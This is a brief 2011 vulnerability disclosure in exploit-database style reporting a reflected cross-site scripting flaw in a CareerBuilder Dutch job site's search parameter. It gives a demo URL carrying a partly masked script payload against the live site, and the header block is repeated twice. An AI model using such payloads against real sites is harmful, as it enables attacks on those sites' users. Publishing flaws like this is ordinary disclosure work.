endLesS
Webmaster
<------------------- header data start ------------------- >
# Application Name: CareerBuilder Cross Site Scripting Vuln.
# Author: expulse ~ Bug Researchers
# Date: 18.07.2011
# Demo: http://www.eenbaan.nl/banen/zoeken/?keyword=**********alert(document.domain)</script>
# Vuln Type: Reflected XSS
# Fixed: Zararlı Karakterler Filitrelenmelidir.
< -- bug code start -- >
http://victim/banen/zoeken/?keyword=XSSAttack]
< -- bug code end of -- >
< ------------------- header data end of ------------------- >
# Application Name: CareerBuilder Cross Site Scripting Vuln.
# Author: expulse ~ Bug Researchers
# Date: 18.07.2011
# Demo: http://www.eenbaan.nl/banen/zoeken/?keyword=**********alert(document.domain)</script>
# Vuln Type: Reflected XSS
# Fixed: Zararlı Karakterler Filitrelenmelidir.
< -- bug code start -- >
http://victim/banen/zoeken/?keyword=XSSAttack]
< -- bug code end of -- >
< ------------------- header data end of ------------------- >